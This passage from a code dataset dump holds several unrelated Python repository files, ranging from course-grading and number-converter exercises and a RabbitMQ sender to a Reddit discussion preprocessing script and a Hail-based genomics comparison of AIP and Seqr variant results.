['Python_backend']\nany_student.courses_in_progress += ['Python_frontend']\nany_student.finished_courses += ['Ведение в программирование']\n\ncool_reviewer = Reviewer('Mikhail', 'Svetlov')\ncool_reviewer.courses_attached += ['Python']\ncool_reviewer.courses_attached += ['Python_backend']\ncool_reviewer.courses_attached += ['Python_frontend']\n\ncool_reviewer.rate_hw(best_student, 'Python', 10)\ncool_reviewer.rate_hw(best_student, 'Python', 10)\ncool_reviewer.rate_hw(best_student, 'Python', 10)\n\ncool_reviewer.rate_hw(any_student, 'Python_backend', 10)\ncool_reviewer.rate_hw(any_student, 'Python_backend', 9)\ncool_reviewer.rate_hw(any_student, 'Python_backend', 9)\n\nbest_lecturer = Lecturer('Ivan', 'Petrov')\nbest_lecturer.courses_attached += ['Python_backend']\nbest_lecturer.courses_attached += ['Python_frontend']\n\nother_lecturer = Lecturer('Johann ', 'Bach')\nother_lecturer.courses_attached += ['Python_backend']\nother_lecturer.courses_attached += ['Python_frontend']\n\nany_student.rate_lecture(best_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_backend', 10)\n\nany_student.rate_lecture(best_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(best_lecturer, 'Python_frontend', 9)\n\nany_student.rate_lecture(other_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_backend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_backend', 9)\n\nany_student.rate_lecture(other_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_frontend', 10)\nany_student.rate_lecture(other_lecturer, 'Python_frontend', 9)\n\nprint(cool_reviewer)\nprint()\nprint(best_lecturer)\nprint()\nprint(other_lecturer)\nprint()\nprint(any_student)\nprint()\nprint(best_lecturer > other_lecturer)\nprint()\nprint(best_student < any_student)\n","repo_name":"Nikolay-Zavrazhnov/oop_task_3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27798702825","text":"import json\nimport os.path\nfrom typing import TYPE_CHECKING, Optional, Type, TypeVar, Union\n\nfrom khl import Message, Event\n\nfrom ..command.builder.nodes.basic import Literal\nfrom ..utils.logger import ColoredLogger\nfrom ..utils.serializer import Serializable\n\nif TYPE_CHECKING:\n from ..khld_server import KHLDaemonServer\n\nSerializableType = TypeVar('SerializableType')\n\n\nclass Interface:\n def __init__(self, khld_server: 'KHLDaemonServer', plugin_id: str) -> None:\n self.khld_server = khld_server\n self.plugin_manager = self.khld_server.plugin_manager\n self.command_manger = self.khld_server.command_manager\n self.plugin_id = plugin_id\n self.config = self.plugin_manager.config\n self.logger = ColoredLogger(level=self.config.log_level, plugin_id=self.plugin_id)\n\n\nclass PluginInterface(Interface):\n\n def register_help_messages(self, prefix: str, desc: str):\n self.plugin_manager.help_messages[prefix] = desc\n\n def register_command(self, literal: Literal):\n self.command_manger.register_command(literal)\n\n def load_config_simple(\n self, file_name='config.json', default_config: Optional = None, *, in_data_folder: bool = True,\n echo_in_console: bool = True, target_class: Optional[Type[SerializableType]] = None,\n encoding: str = 'utf8'\n ) -> Union[dict, SerializableType]:\n def 
log(msg):\n if echo_in_console:\n self.logger.info(msg)\n\n if target_class is not None:\n target_class: Serializable\n if default_config is None:\n default_config = target_class.get_default().serialize()\n config_file_path = os.path.join(self.get_data_folder(), file_name) if in_data_folder else file_name\n needs_save = False\n try:\n with open(config_file_path, encoding=encoding) as file_handle:\n read_data: dict = json.load(file_handle)\n except Exception as e:\n if default_config is not None:\n result_config = default_config.copy()\n else:\n raise e\n needs_save = True\n log('读取配置文件失败,使用默认值: {}'.format(e))\n else:\n result_config = read_data\n if default_config is not None:\n for key, value in default_config.items():\n if key in read_data:\n result_config[key] = read_data[key]\n else:\n result_config[key] = value\n log(f'发现缺失的键 \"{key}\",使用默认值\"{value}\"')\n needs_save = True\n log('配置文件已加载')\n if target_class is not None:\n try:\n result_config = target_class.deserialize(result_config)\n except Exception as e:\n result_config = target_class.get_default()\n needs_save = True\n log('读取配置文件失败,使用默认值: {}'.format(e))\n else:\n if default_config is not None:\n for key in list(result_config.keys()):\n if key not in default_config:\n result_config.pop(key)\n if needs_save:\n self.save_config_simple(result_config, file_name=file_name, in_data_folder=in_data_folder)\n return result_config\n\n def get_data_folder(self) -> str:\n plugin_data_folder = os.path.join('config', self.plugin_id)\n if not os.path.isdir(plugin_data_folder):\n os.makedirs(plugin_data_folder)\n return plugin_data_folder\n\n def save_config_simple(\n self, config: Union[dict, Serializable], file_name: str = 'config.json', *, in_data_folder: bool = True,\n encoding: str = 'utf8'\n ) -> None:\n config_file_path = os.path.join(self.get_data_folder(), file_name) if in_data_folder else file_name\n if isinstance(config, Serializable):\n data = config.serialize()\n else:\n data = config\n target_folder = os.path.dirname(config_file_path)\n if len(target_folder) > 0 and not os.path.isdir(target_folder):\n os.makedirs(target_folder)\n with open(config_file_path, 'w', encoding=encoding) as file:\n json.dump(data, file, indent=4, ensure_ascii=False)\n\n\nclass MessageInterface(Interface):\n\n def __init__(self, khld_server: 'KHLDaemonServer', plugin_id: str, msg: Message) -> None:\n super().__init__(khld_server, plugin_id)\n self.message = msg\n\n\nclass EventInterface(Interface):\n\n def __init__(self, khld_server: 'KHLDaemonServer', plugin_id: str, event: Event) -> None:\n super().__init__(khld_server, plugin_id)\n self.event = event\n","repo_name":"DancingSnow0517/KHLDaemon","sub_path":"khldaemon/plugin/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"15279894745","text":"import sys\n\nN, M = map(int, sys.stdin.readline().split())\nminutes = list(map(int, sys.stdin.readline().split()))\n\n\ndef counter(arr, limit):\n count = 1\n tmp_sum = 0\n for one in arr:\n if limit < one:\n return 0xFFFFFF\n else:\n if tmp_sum + one <= limit:\n tmp_sum += one\n else:\n count += 1\n tmp_sum = one\n return count\n\n\nlimit = max(sum(minutes) // M, max(minutes))\n\nwhile True:\n while M < counter(minutes, limit):\n limit += 1\n while counter(minutes, limit - 1) <= M:\n limit -= 1\n print(limit)\n break\n","repo_name":"Hamsik2rang/Krafton-Jungle-Whiteboard-Algorithm","sub_path":"이현홍/old/2343 - 기타 
레슨.py","file_name":"2343 - 기타 레슨.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"30704744702","text":"import pika\n\nmessage=\"Hallo wereld!\"\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='hello')\n\nchannel.basic_publish(exchange='', routing_key='hello', body=message)\nprint(\" [x] Sent \"+message)\nconnection.close()","repo_name":"MichielBbal/Notebooks","sub_path":"amqp_send.py","file_name":"amqp_send.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43745775938","text":"def to_binary(number, arr):\n number = int(number)\n division = number // 2\n rest = number % 2\n\n arr.append(str(rest))\n if division > 0:\n to_binary(division, arr)\n\n return ''.join(reversed(arr))\n\ndef to_decimal(binary):\n arr = [*str(binary)]\n arr.reverse()\n i = 0\n sum = 0\n exp = 0\n for number in arr:\n if int(number) != 0 and int(number) != 1:\n raise Exception('Números binários só podem utilizar dois algarismos, 0 ou 1.')\n if int(number) != 0:\n exp = 2 ** int(i)\n sum += exp \n i += 1\n return sum\n \nDIV_LENGTH = 35\n\ndef converter():\n print('='* DIV_LENGTH)\n print('Binary to Decimal Converter')\n print('='* DIV_LENGTH)\n print('\\n')\n\n while True:\n print('='* DIV_LENGTH)\n print(\"Qual operação você deseja realizar? \\n 1: Binário -> Decimal \\n 2: Decimal -> Binário\")\n operation = int(input())\n\n if operation == 1:\n print('='* DIV_LENGTH)\n print(\"Informe o número que deseja converter para decimal\")\n binary_number = input()\n print(f'O número binário \"{binary_number}\" equivale ao número decimal \"{to_decimal(binary_number)}\".')\n elif operation == 2:\n print('='* DIV_LENGTH)\n print(\"Informe o número que deseja converter para binário\")\n list = []\n decimal_number = input()\n print(f'O número decimal \"{decimal_number}\" equivale ao número binário \"{to_binary(decimal_number, list)}\"')\n else: \n print('='* DIV_LENGTH)\n print('Operação inválida')\n \n print('Converter novamente? 
(Y/N)')\n run_again = input()\n if (run_again.lower() == 'n'):\n break\n elif run_again.lower() != 'y' and run_again.lower() != 'n':\n print(f'Considerando que era pra informar \"Y\" ou \"N\" e você informou \"{run_again}\", vamos considerar que você deseja executar mais uma conversão.')\n\nconverter()","repo_name":"phllp/udesc","sub_path":"binary_converter/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72661853519","text":"import json\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\nscript_folder = Path(__file__).parent\n\n\n# Read data\ndataset = []\n\nwith open(script_folder / 'threads.jsonl', encoding=\"utf8\") as f:\n for line in tqdm(f, total=65169, desc='Read Threads'):\n thread = json.loads(line)\n\n original_poster = thread['author']\n delta_thread = thread['delta']\n\n def _go_through_comments(comments: list) -> bool:\n global sum_num_comments\n # check delta\n has_delta_comment = False\n for comment in comments:\n if comment['author'] == original_poster and ('∆' in comment['body'] or '\\u2206' in comment['body']):\n has_delta_comment = True\n comments.remove(comment) # delete delta award comment\n break\n # process\n for comment in comments:\n # filter delete comments by moderator\n if comment['distinguished'] == 'moderator' and 'removed' in comment['body'].lower():\n continue\n # filter deleted comments\n if comment['body'] == '[deleted]':\n continue\n dataset.append({\n 'id': comment['id'],\n 'author': comment['author'],\n 'parent_id': comment['parent_id'],\n 'level': comment['level'],\n 'distinguished': comment['distinguished'],\n 'score': comment['score'],\n 'title': None,\n 'body': comment['body'],\n 'delta_awarded': _go_through_comments(comment['children']), # TODO: delta\n 'delta_thread': delta_thread,\n })\n return has_delta_comment\n\n # filter empty discussions\n if thread['num_comments'] <= 1:\n continue\n # filter modpost\n if '[Mod Post]' in thread['title']:\n continue\n\n # start recursion for the thread\n _go_through_comments(thread['comments'])\n\n dataset.append({\n 'id': thread['id'],\n 'author': original_poster,\n 'parent_id': None,\n 'level': None,\n 'distinguished': thread['distinguished'],\n 'score': thread['score'],\n 'title': thread['title'],\n 'body': thread['selftext'],\n 'delta_awarded': False,\n 'delta_thread': delta_thread,\n })\n\n\ndataset = dataset[::-1]\ndataset_lvl0 = [sample for sample in dataset if sample['level'] is None or sample['level'] == 0]\ndataset_delta = [sample for sample in dataset if sample['delta_thread']]\ndataset_delta_lvl0 = [sample for sample in dataset_lvl0 if sample['delta_thread']]\n\n\n# EDA\nprint('Dataset (full):', len(dataset))\nprint('Dataset (lvl0):', len(dataset_lvl0))\nprint('Dataset (delta):', len(dataset_delta))\nprint('Dataset (delta lvl0):', len(dataset_delta_lvl0))\n\nnum_threads = sum(1 for sample in dataset if sample['level'] is None)\nnum_threads_delta = sum(1 for sample in dataset_delta if sample['level'] is None)\nprint('Num threads:', num_threads)\nprint('Num delta threads:', num_threads_delta)\n\nprint('Average comments total:', sum(1 for sample in dataset if sample['level'] is not None) / num_threads)\nprint('Average comments lvl0:', sum(1 for sample in dataset_lvl0 if sample['level'] == 0) / num_threads)\nprint('Average comments total delta:', sum(1 for sample in dataset_delta if sample['level'] is not 
None) / num_threads_delta)\nprint('Average comments lvl0 delta:', sum(1 for sample in dataset_delta_lvl0 if sample['level'] == 0) / num_threads_delta)\n\n\nauthors_threads_dict = defaultdict(int)\nfor sample in dataset:\n if sample['level'] is None:\n authors_threads_dict[sample['author']] += 1\nprint('Num authors:', len(authors_threads_dict.keys()))\nprint('Average num author threads:', np.mean(list(authors_threads_dict.values())))\n\ndelta_authors_threads_dict = defaultdict(int)\nfor sample in dataset_delta:\n if sample['level'] is None:\n delta_authors_threads_dict[sample['author']] += 1\nprint('Num authors delta:', len(delta_authors_threads_dict.keys()))\nprint('Average num author threads delta:', np.mean(list(delta_authors_threads_dict.values())))\n\n\n# Save\nwith open(script_folder / 'dataset_full.jsonl', 'w') as f:\n for sample in tqdm(dataset, desc='Save dataset (full)'):\n json.dump(sample, f)\n f.write('\\n')\n\nwith open(script_folder / 'dataset_lvl0.jsonl', 'w') as f:\n for sample in tqdm(dataset_lvl0, desc='Save dataset (lvl0)'):\n json.dump(sample, f)\n f.write('\\n')\n\nwith open(script_folder / 'dataset_full_delta.jsonl', 'w') as f:\n for sample in tqdm(dataset_delta, desc='Save dataset (full w/ delta)'):\n json.dump(sample, f)\n f.write('\\n')\n\nwith open(script_folder / 'dataset_lvl0_delta.jsonl', 'w') as f:\n for sample in tqdm(dataset_delta_lvl0, desc='Save dataset (lvl0 w/ delta)'):\n json.dump(sample, f)\n f.write('\\n')\n","repo_name":"lct-rug-2022/language-tech-project","sub_path":"discussion-task/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35438700852","text":"import json\n\ndef deleteUserFromDb(userJson):\n users = readDb()\n users.remove(userJson)\n writeDb(users)\n\ndef addUserToDb(user):\n users = readDb()\n userDict = {\n \"userno\":user.get_user_no(),\n \"name\": user.get_name(),\n \"surname\": user.get_surname(),\n \"age\": user.get_age(),\n \"username\": user.get_username(),\n \"password\": user.get_password()\n }\n users.append(userDict)\n writeDb(users)\n\ndef readDb():\n with open(\"database.json\", \"r\", encoding=\"utf-8\") as file:\n if bool(file.read()):\n file.seek(0)\n users = json.load(file)\n else:\n users = []\n return users\n\ndef writeDb(users):\n with open(\"database.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump(users, file)","repo_name":"sahilappayev/RegistrationSystem","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39080995918","text":"\"\"\"\ncompares a Seqr file against results of a previous AIP run\n\nThe Seqr file is a TSV of all variants flagged as interesting\nThis is designed to recognise flags in the format 'AIP training: Confidence'\n\nSee relevant documentation for a description of the algorithm used\n\"\"\"\n# mypy: ignore-errors\nimport json\nimport os\nfrom collections import defaultdict\nfrom csv import DictReader\nfrom enum import Enum\nimport logging\nimport re\nimport sys\nfrom typing import Any\n\nfrom argparse import ArgumentParser\nfrom cloudpathlib import AnyPath\nfrom cyvcf2 import VCFReader\nimport hail as hl\nfrom peddy import Ped\n\nfrom cpg_utils.config import get_config\nfrom cpg_utils.hail_batch import init_batch\n\nfrom reanalysis.hail_filter_and_label import (\n extract_annotations,\n filter_matrix_by_ac,\n 
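# The db helpers above follow a read-modify-write cycle against one JSON file.
# A compact Python 3 sketch of the same pattern (file name as in the snippet;
# an empty or missing file is treated as an empty user list):
import json

DB = 'database.json'

def read_db():
    try:
        with open(DB, encoding='utf-8') as f:
            raw = f.read().strip()
            return json.loads(raw) if raw else []
    except FileNotFoundError:
        return []

def add_user(record):
    users = read_db()  # always start from what is on disk, never a stale global
    users.append(record)
    with open(DB, 'w', encoding='utf-8') as f:
        json.dump(users, f)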
filter_on_quality_flags,\n filter_to_population_rare,\n filter_to_well_normalised,\n green_and_new_from_panelapp,\n CONFLICTING,\n LOFTEE_HC,\n PATHOGENIC,\n)\n\nfrom reanalysis.utils import read_json_from_path, canonical_contigs_from_vcf\n\nSAMPLE_NUM_RE = re.compile(r'sample_[0-9]+')\nSAMPLE_ALT_TEMPLATE = 'num_alt_alleles_{}'\nVALID_VALUES = [\n 'AIP training: Expected',\n 'AIP training: Possible',\n 'AIP training: Unlikely',\n]\n\n\nclass Confidence(Enum):\n \"\"\"\n enumeration for possible confidence values\n from AIP we get CERTAIN, as these are found\n from seqr dump, we use tags to determine confidence\n - where confidence means 'how confident are we that\n AIP should be capturing this result'\n \"\"\"\n\n EXPECTED = 'AIP training: Expected'\n POSSIBLE = 'AIP training: Possible'\n UNLIKELY = 'AIP training: Unlikely'\n\n def __lt__(self, other):\n return self.value < other.value\n\n\nclass CommonFormatResult:\n \"\"\"\n a common representation of variant details\n \"\"\"\n\n def __init__(\n self, chrom: str, pos: int, ref: str, alt: str, confidence: list[Confidence]\n ):\n \"\"\"\n always normalise contig - upper case, with no CHR prefix\n :param chrom:\n :param pos:\n :param ref:\n :param alt:\n :param confidence:\n \"\"\"\n self.chr: str = self.normalise_chrom(chrom)\n self.pos: int = pos\n self.ref: str = ref\n self.alt: str = alt\n self.confidence: list[Confidence] = confidence\n\n @staticmethod\n def normalise_chrom(chrom: str) -> str:\n \"\"\"\n normalise the string name\n :param chrom:\n :return:\n \"\"\"\n up_chrom = chrom.upper()\n chrom = up_chrom[up_chrom.startswith('CHR') and 3 :]\n return chrom\n\n def get_cyvcf2_pos(self, contigs: set[str]) -> tuple[str, str]:\n \"\"\"\n get variant coordinates in string format\n returns the coordinates for a cyvcf2 query, AND\n the contig name, normalised to the VCF\n :param contigs: all the contigs present in the VCF\n :return:\n \"\"\"\n if self.chr in contigs:\n string_chr = self.chr\n else:\n string_chr = f'chr{self.chr}'\n\n if string_chr not in contigs:\n raise ValueError(\n f'Contigs in this VCF not compatible with provided locus: {self}'\n )\n return string_chr, f'{string_chr}:{self.pos}-{self.pos}'\n\n def get_hail_pos(self) -> tuple[hl.Locus, list[str]]:\n \"\"\"\n get relevant values for finding a variant row within a MT\n :return:\n \"\"\"\n return hl.Locus(\n contig=f'chr{self.chr}', position=self.pos, reference_genome='GRCh38'\n ), [\n self.ref,\n self.alt,\n ]\n\n def __repr__(self):\n return (\n f'{self.chr}:{self.pos}_{self.ref}>{self.alt} '\n f'- {\", \".join(map(str, sorted(self.confidence)))}'\n )\n\n def __eq__(self, other):\n return (\n self.chr == other.chr\n and self.pos == other.pos\n and self.ref == other.ref\n and self.alt == other.alt\n )\n\n def __hash__(self):\n \"\"\"\n hash function\n :return:\n \"\"\"\n return hash(repr(self))\n\n\nCommonDict = dict[str, list[CommonFormatResult]]\nReasonDict = dict[str, list[tuple[CommonFormatResult, list[str]]]]\n\n\ndef common_format_aip(results_dict: dict[str, Any]) -> CommonDict:\n \"\"\"\n Parses the JSON\n\n :param results_dict:\n :return:\n \"\"\"\n sample_dict: CommonDict = defaultdict(list)\n\n # collect all per-sample results into a separate index\n for sample, variants in results_dict.items():\n\n for var in variants:\n coords = var['var_data']['coords']\n sample_dict[sample].append(\n CommonFormatResult(\n coords['chrom'],\n int(coords['pos']),\n coords['ref'],\n coords['alt'],\n [Confidence.EXPECTED],\n )\n )\n\n return sample_dict\n\n\ndef 
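# The normalise_chrom one-liner above leans on an operator trick:
# `up.startswith('CHR') and 3` evaluates to 3 when the prefix is present and to
# False (which indexes as 0) when it is not. An equivalent, explicit spelling:
def normalise_chrom(chrom: str) -> str:
    up = chrom.upper()
    return up[3:] if up.startswith('CHR') else up

assert normalise_chrom('chr7') == '7'
assert normalise_chrom('X') == 'X'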
common_format_seqr(seqr: str, affected: list[str]) -> CommonDict:\n \"\"\"\n identify the most likely proband for each row, and create a variant object for them\n\n :param seqr:\n :param affected:\n :return:\n \"\"\"\n\n assert seqr.endswith('.tsv'), 'process requires a TSV format export'\n sample_dict: CommonDict = defaultdict(list)\n\n with AnyPath(seqr).open() as handle:\n seqr_parser = DictReader(handle, delimiter='\\t')\n\n # Each Sample ID is under a separate column heading, e.g. sample_1\n # this is instead of proband/mother/father; no mandatory family structure\n sample_cols = [\n sample_field\n for sample_field in seqr_parser.fieldnames\n if SAMPLE_NUM_RE.match(sample_field)\n ]\n\n for entry in seqr_parser:\n\n # get all valid tags\n tags = [\n Confidence(tag)\n for tag in entry['tags'].split('|')\n if tag in VALID_VALUES\n ]\n\n # no relevant tags, not interested...\n if len(tags) == 0:\n continue\n\n # create a variant object\n variant_obj = CommonFormatResult(\n entry['chrom'],\n int(entry['pos']),\n entry['ref'],\n entry['alt'],\n confidence=tags,\n )\n\n # seqr has no notion of 'proband', so add for each affected\n # see README for discussion\n for index, value in enumerate(sample_cols, 1):\n if (\n entry[value] in affected\n and int(entry[SAMPLE_ALT_TEMPLATE.format(index)]) > 0\n ):\n sample_dict[entry[value]].append(variant_obj)\n\n logging.info(f'Variants from Seqr digest: {sample_dict}')\n\n return sample_dict\n\n\ndef find_seqr_flags(aip_results: CommonDict, seqr_results: CommonDict) -> dict:\n \"\"\"\n check for exact matches to the Seqr flags, and report numbers\n returns a per-confidence dictionary of the variant details and counts\n Args:\n aip_results ():\n seqr_results ():\n\n Returns:\n\n \"\"\"\n\n flag_matches = {\n key: {\n 'matched': {'details': [], 'count': 0},\n 'unmatched': {'details': [], 'count': 0},\n }\n for key in ['EXPECTED', 'UNLIKELY', 'POSSIBLE']\n }\n total_seqr_variants = 0\n\n for sample, variants in seqr_results.items():\n if sample not in aip_results:\n for v in variants:\n for conf in v.confidence:\n flag_matches[conf.name]['unmatched']['details'].append(\n f'{sample}::{repr(v)}'\n )\n flag_matches[conf.name]['unmatched']['count'] += 1\n total_seqr_variants += 1\n continue\n\n aip_variants = aip_results[sample]\n for v in variants:\n total_seqr_variants += 1\n match = 'matched' if v in aip_variants else 'unmatched'\n for conf in v.confidence:\n flag_matches[conf.name][match]['details'].append(f'{sample}::{repr(v)}')\n flag_matches[conf.name][match]['count'] += 1\n\n # print a summary into logging\n logging.info(f'Total Seqr Variants: {total_seqr_variants}')\n for confidence, match_types in flag_matches.items():\n logging.info(f'{confidence}')\n for match_type, match_dict in match_types.items():\n logging.info(f'\\t{match_type} - {match_dict[\"count\"]}')\n\n return flag_matches\n\n\ndef find_missing(aip_results: CommonDict, seqr_results: CommonDict) -> CommonDict:\n \"\"\"\n 1 way comparison - find all results present in Seqr, and missing from AIP\n This is a check for False Negatives\n :param aip_results:\n :param seqr_results:\n :return:\n \"\"\"\n discrepancies: CommonDict = defaultdict(list)\n\n # get all common samples between the two data sets\n seqr_samples = set(seqr_results.keys())\n aip_samples = set(aip_results.keys())\n\n common_samples = aip_samples.intersection(seqr_samples)\n\n missing_samples = seqr_samples - common_samples\n if len(missing_samples) > 0:\n logging.error(\n f'Samples completely missing from AIP results: '\n 
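# The `v in aip_variants` membership tests above work because the result class
# defines __eq__ over (chrom, pos, ref, alt) and a consistent __hash__. A frozen
# dataclass gives the same behaviour for free (illustrative, not the real class):
from dataclasses import dataclass

@dataclass(frozen=True)
class Var:
    chrom: str
    pos: int
    ref: str
    alt: str

seen = {Var('1', 100, 'A', 'T')}
print(Var('1', 100, 'A', 'T') in seen)  # True: equal fields, equal hash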
f'{\", \".join(missing_samples)}'\n )\n\n # for each of those missing samples, add all variants\n for miss_sample in missing_samples:\n discrepancies[miss_sample] = seqr_results[miss_sample]\n logging.error(\n f'Sample {miss_sample}: '\n f'{len(seqr_results[miss_sample])} missing variant(s)'\n )\n\n for sample in common_samples:\n\n # only finds discrepancies, not Matched results - revise\n sample_discrepancies = [\n variant\n for variant in seqr_results[sample]\n if variant not in aip_results[sample]\n ]\n\n # only populate the index if missing variants found\n if sample_discrepancies:\n discrepancies[sample] = sample_discrepancies\n\n # log the number of matches\n matched = len(\n [\n variant\n for variant in seqr_results[sample]\n if variant in aip_results[sample]\n ]\n )\n\n logging.info(f'Sample {sample} - {matched} matched variant(s)')\n logging.info(\n f'Sample {sample} - {len(sample_discrepancies)} missing variant(s)'\n )\n\n return discrepancies\n\n\ndef find_affected_samples(pedigree: Ped) -> list[str]:\n \"\"\"\n finds all affected members of the provided pedigree\n\n :param pedigree:\n :return:\n \"\"\"\n return [sam.sample_id for sam in pedigree.samples() if sam.affected]\n\n\ndef check_in_vcf(vcf_path: str, variants: CommonDict) -> tuple[CommonDict, CommonDict]:\n \"\"\"\n check whether each variant is present within the labelled VCF\n split list of discrepancies into two collections;\n - in VCF (investigate via MOI)\n - not in VCF (investigate within MT)\n\n Args:\n vcf_path ():\n variants ():\n\n Returns:\n\n \"\"\"\n\n in_vcf: CommonDict = defaultdict(list)\n not_in_vcf: CommonDict = defaultdict(list)\n\n # open the VCF for reading (VCF needs to be localised in hail)\n vcf_handler = VCFReader(vcf_path)\n vcf_contigs = canonical_contigs_from_vcf(vcf_handler)\n\n # iterate over all samples, and corresponding lists\n for sample, var_list in variants.items():\n for var in var_list:\n\n # assume missing until confirmed otherwise\n found = False\n normalised_chrom, coordinates = var.get_cyvcf2_pos(vcf_contigs)\n for vcf_var in vcf_handler(coordinates):\n\n # check position and alleles\n if (\n vcf_var.CHROM == normalised_chrom\n and vcf_var.POS == var.pos\n and vcf_var.REF == var.ref\n and vcf_var.ALT[0] == var.alt\n ):\n found = True\n in_vcf[sample].append(var)\n break\n if not found:\n not_in_vcf[sample].append(var)\n\n return in_vcf, not_in_vcf\n\n\ndef find_variant_in_mt(\n matrix: hl.MatrixTable, var: CommonFormatResult\n) -> hl.MatrixTable:\n \"\"\"\n :param matrix:\n :param var:\n :return:\n \"\"\"\n var_locus, var_alleles = var.get_hail_pos()\n logging.info(f'Querying for {var_locus}: {var_alleles}')\n return matrix.filter_rows(\n (matrix.locus == var_locus) & (matrix.alleles == var_alleles)\n )\n\n\ndef check_gene_is_green(\n matrix: hl.MatrixTable, green_genes: hl.SetExpression\n) -> hl.MatrixTable:\n \"\"\"\n :param matrix:\n :param green_genes:\n :return:\n \"\"\"\n return matrix.filter_rows(green_genes.contains(matrix.geneIds))\n\n\ndef run_ac_check(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n if there are enough samples in the joint call, run the AC test\n :param matrix:\n :return:\n \"\"\"\n if (\n filter_matrix_by_ac(matrix, get_config()['filter']['ac_threshold']).count_rows()\n == 0\n ):\n return ['QC: AC too high in joint call']\n return []\n\n\ndef run_quality_flag_check(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n check the variant wasn't flagged by the caller/VQSR\n :param matrix:\n :return:\n \"\"\"\n if filter_on_quality_flags(matrix).count_rows() 
== 0:\n return ['QC: Variant has assigned quality flags']\n return []\n\n\ndef check_variant_was_normalised(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n checks the variant is normalised\n :param matrix:\n :return:\n \"\"\"\n\n if filter_to_well_normalised(matrix).count_rows() == 0:\n return ['QC: Variant not well normalised']\n return []\n\n\ndef check_population_rare(matrix: hl.MatrixTable) -> tuple[hl.MatrixTable, list[str]]:\n \"\"\"\n filter out all rare variants, return fail reason if everything is removed\n :param matrix:\n :return:\n \"\"\"\n matrix = filter_to_population_rare(matrix)\n\n if matrix.count_rows() == 0:\n return matrix, ['AF: No variants remain after Rare filter']\n return matrix, []\n\n\ndef check_cat_1(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n test against all conditions of category 1\n pretty primitive approach - apply a filter, count the rows...\n :param matrix:\n :return:\n \"\"\"\n reasons = []\n if matrix.filter_rows(matrix.info.clinvar_stars > 0).count_rows() == 0:\n reasons.append('C1: ClinVar stars 0 or missing')\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(PATHOGENIC)\n ).count_rows()\n == 0\n ):\n reasons.append('C1: Not ClinVar Pathogenic')\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(CONFLICTING)\n ).count_rows()\n > 0\n ):\n reasons.append('C1: ClinVar rating Conflicting')\n return reasons\n\n\ndef filter_csq_to_set(matrix: hl.MatrixTable) -> hl.MatrixTable:\n \"\"\"\n overwrite the transcript consequences by only retaining those which\n have a consequence term overlapping with the supplied set\n :param matrix:\n :return:\n \"\"\"\n critical_consequences = hl.set(get_config()['filter']['critical_csq'])\n\n # consequence_terms is an array - cast as a set\n csq_mt = matrix.annotate_rows(\n vep=matrix.vep.annotate(\n transcript_consequences=matrix.vep.transcript_consequences.filter(\n lambda x: hl.len(\n critical_consequences.intersection(hl.set(x.consequence_terms))\n )\n > 0\n )\n )\n )\n\n # return rows which have remaining consequences\n return csq_mt.filter_rows(hl.len(csq_mt.vep.transcript_consequences) > 0)\n\n\ndef check_cadd_revel(matrix: hl.MatrixTable) -> int:\n \"\"\"\n :param matrix:\n :return:\n \"\"\"\n\n return matrix.filter_rows(\n (matrix.info.cadd > get_config()['filter']['in_silico']['cadd'])\n | (matrix.info.revel > get_config()['filter']['in_silico']['revel'])\n ).count_rows()\n\n\ndef check_cat_2(matrix: hl.MatrixTable, new_genes: hl.SetExpression) -> list[str]:\n \"\"\"\n test against all conditions of category 2\n :param matrix:\n :param new_genes:\n :return:\n \"\"\"\n reasons = []\n if matrix.filter_rows(new_genes.contains(matrix.geneIds)).count_rows() == 0:\n reasons.append('C2: Gene was not New in PanelApp')\n\n # filter to high CSQ, so count_rows shows whether there were rows left\n csq_filtered = filter_csq_to_set(matrix=matrix)\n if not csq_filtered.count_rows():\n reasons.append('C2: No HIGH CSQs')\n\n # stop here, nothing left to search\n return reasons\n\n if (\n matrix.filter_rows(\n matrix.info.clinvar_sig.lower().contains(PATHOGENIC)\n ).count_rows()\n == 0\n ):\n reasons.append('C2: Not ClinVar Pathogenic')\n\n if check_cadd_revel(matrix) == 0:\n reasons.append('C2: CADD & REVEL not significant')\n\n return reasons\n\n\ndef check_cat_3(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n test against all conditions of category 3\n :param matrix:\n :return:\n \"\"\"\n reasons: list[str] = []\n\n # row-dependent annotation check\n if (\n matrix.filter_rows(\n 
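# Every category check above uses the same probe: apply a row filter, then ask
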